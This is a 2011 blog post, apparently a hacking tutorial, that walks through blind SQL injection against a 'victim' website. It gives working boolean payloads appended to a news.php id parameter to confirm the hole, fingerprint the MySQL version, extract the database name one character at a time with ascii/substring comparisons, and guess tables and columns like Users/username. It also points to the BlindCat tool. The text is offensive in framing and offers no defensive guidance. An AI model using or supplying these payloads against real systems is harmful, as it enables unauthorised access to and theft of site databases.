Monday, January 10, 2011

Blind SQL Injection

This type of SQL injection is very difficult, because this technique is based on true or false statements. This technique should be used only if the error based technique doesn't work. Well first of all you need to find an vulnerability on the website of the victim. To do this you need to add "+AND+1=1" on the end.
www.victim.com/news.php?id=6+AND+1=1

Web site of the victim should be unchanged. Now you try to add "+AND+1=2" on the end.
www.victim.com/news.php?id=6+AND+1=2

If you see an error in the browser then you are on a good way. This means that the website is vulnerable.


Now it's time to find out the version of the database. For this action we use "Substring" keyword. For example.
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=4
  
If you see an error in the browser it means that your database isn't version 4 (ex. 4.2.2). Now we need to check is it version 5 (ex. 5.0.51b-log).
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=5

You'll probably get the normal view page without errors. This means that the database version is a 5. Now it's time to test subselect. 
www.victim.com/news.php?id=6+and+(select+1)=1

If no error occurs, subselect is correct. The next step is to find the name of the database. First you need to find how many characters contain the name of the database. For this action I use "Length" keyword. For example.

1 question: Is it lower then 10? 
www.victim.com/news.php?id=6+and+length(database())<10
1 answer: No error = YES

2 question:  Is it lower then 6? 
www.victim.com/news.php?id=6+and+length(database())<6
2 answer: Error = NO

3 question: Is it equal 6? 
www.victim.com/news.php?id=6+and+length(database())=6
3 answer: No error = YES

Now we know that the name of the database contains 6 characters. It's time to show you how to find them. The principle is the same like searching for how many character contains the name.

1 question: Is it lower then 97? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<97
1 answer: Error = NO


2 question: Is it lower then 122? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<122
2 answer: No Error = YES

This means that the first character of the name of the database is between 97 and 122 on ascii codes table. see full ascii codes table for all symbols, characters and numbers.

3 question: Is it equal 118? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))=118
3 answer: No Error = YES

We find the first character of six. It's 118. If you look at http://ascii-ascii.blogspot.com you'll see that 118 is equal to the letter lowercase "v". Now we need to find second letter.

1 question: Is it lower then 108? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))<108
1 answer: No error =YES

2 question: Is it equal 105? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))=105
2 answer: No error =YES

We find the second character of six. It's 105. If you look at http://ascii-ascii.blogspot.com you'll see that 105 is equal to the letter lowercase "i".

We do the same thing for the third character.
1 question: Is it lower then 102? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))<102
1 answer: No error =YES

2 question: Is it equal 99? 
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))=99
2 answer: No error =YES

And we find the third character of six. It's 99. If you look at http://ascii-ascii.blogspot.com you'll see that 99 is equal to the letter lowercase "c".


We have 3 letters "vic..." I assumed the database name is "victim". On the same way you can find tables, columns even data. Query's for obtaining this information can be found at http://web-injection.blogspot.com/2010/10/error-based-sql-injections.html. Also you can use some tools like "BlindCat".


Sometimes you can try to find tables or columns with a guessing. For example assuming that there is a table "Users". 
www.victim.com/news.php?id=6+and+(select+1+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist

For column "username" in table "Users" query would look like this. 
www.victim.com/news.php?id=6+and+(select+substring(concat(1,username),1,1)+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist

Be creative ...